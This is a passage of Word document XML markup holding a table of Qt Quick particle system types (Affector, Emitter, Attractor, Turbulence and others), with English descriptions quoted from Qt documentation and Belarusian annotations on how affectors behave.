              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Applies </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>alterations to the attributes of logical particles at any point in their lifetime</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>base</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Affector does not alter any attributes, but can be </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>used to emit a signal</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> when a par</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ticle meets certain conditions.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">If an affector has a defined </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>size</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, then it </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>will only affect</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> particles within i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ts size and position on screen.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Affectors have </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>different performance characteristics</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to the other particle system elements. In particular, they have some simplifications to try to maintain a simulation at real-time or faster. When running a system with Affectors, irregular frame timings that grow too large ( &gt; one second per frame) will cause the Affectors to try and cut corners with a faster but less accurate simulation. If the system has multiple affectors the </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>order</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in which they are applied </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is not guaranteed</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, and when simulating larger time shifts they will simulate the whole shift each, which can lead to different results c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ompared to smaller time shifts. </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>Не зусім ясны і пакуль не вельмі важныя асаблівасці работы афектараў.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Accurate simulation for large numbers of particles (hundreds) with multiple affectors may be possible on some hardware</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, but on less capable hardware you should expect small irregularties in the simulation as simulates with worse granularity.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>Кепскія эфекты пры выкарыстанні афектараў на слабым жалезе.</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B55535" w:rsidRPr="00B55535" w:rsidRDefault="00490E7E" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1874" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>://</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>doc</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qt</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>io</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qt</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>-5/</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qml</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qtquick</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>particles</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>-</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>affector</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>.</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55535" w:rsidRPr="00B55535"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75" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Emitter</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Emits logical particles</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76" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Shape</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For specifying an area for affectors and emitters</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77" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ParticleGroup</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For setting attributes on a logical particle group</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78" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ParticlePainter</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For specifying how to paint particles</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79" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ParticleSystem</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A system which includes particle painter, emitter, and affector types</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spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1880" w:history="1">
              <w:bookmarkStart w:id="1476" w:name="_Toc483000849"/>
              <w:bookmarkStart w:id="1477" w:name="_Toc483003842"/>
              <w:bookmarkStart w:id="1478" w:name="_Toc483604195"/>
              <w:bookmarkStart w:id="1479" w:name="_Toc483605415"/>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="20"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:b w:val="0"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Attractor</w:t>
              </w:r>
              <w:bookmarkEnd w:id="1476"/>
              <w:bookmarkEnd w:id="1477"/>
              <w:bookmarkEnd w:id="1478"/>
              <w:bookmarkEnd w:id="1479"/>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r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For attracting particles towards a specific point</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spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1881" w:history="1">
              <w:bookmarkStart w:id="1480" w:name="_Toc483000850"/>
              <w:bookmarkStart w:id="1481" w:name="_Toc483003843"/>
              <w:bookmarkStart w:id="1482" w:name="_Toc483604196"/>
              <w:bookmarkStart w:id="1483" w:name="_Toc483605416"/>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="20"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:b w:val="0"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>PointDirection</w:t>
              </w:r>
              <w:bookmarkEnd w:id="1480"/>
              <w:bookmarkEnd w:id="1481"/>
              <w:bookmarkEnd w:id="1482"/>
              <w:bookmarkEnd w:id="1483"/>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r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For specifying a direction that varies in x and y components</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spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1882" w:history="1">
              <w:bookmarkStart w:id="1484" w:name="_Toc483000851"/>
              <w:bookmarkStart w:id="1485" w:name="_Toc483003844"/>
              <w:bookmarkStart w:id="1486" w:name="_Toc483604197"/>
              <w:bookmarkStart w:id="1487" w:name="_Toc483605417"/>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="20"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:b w:val="0"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>RectangleShape</w:t>
              </w:r>
              <w:bookmarkEnd w:id="1484"/>
              <w:bookmarkEnd w:id="1485"/>
              <w:bookmarkEnd w:id="1486"/>
              <w:bookmarkEnd w:id="1487"/>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r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For specifying an area for affectors and emitter</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FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1883" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="FF0000"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>SpriteGoal</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FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For changing the state of a sprite particle</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FF0000"/>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84" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>TargetDirection</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For specifying a direction towards the target point</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85" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>TrailEmitter</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Emits logical particles from other logical particles</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pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1886" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Turbulence</w:t>
              </w:r>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r w:rsidRPr="00B55535">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Provides fluid-like forces from a noise image</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pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="40424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spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:i/>
                <w:color w:val="404244"/>
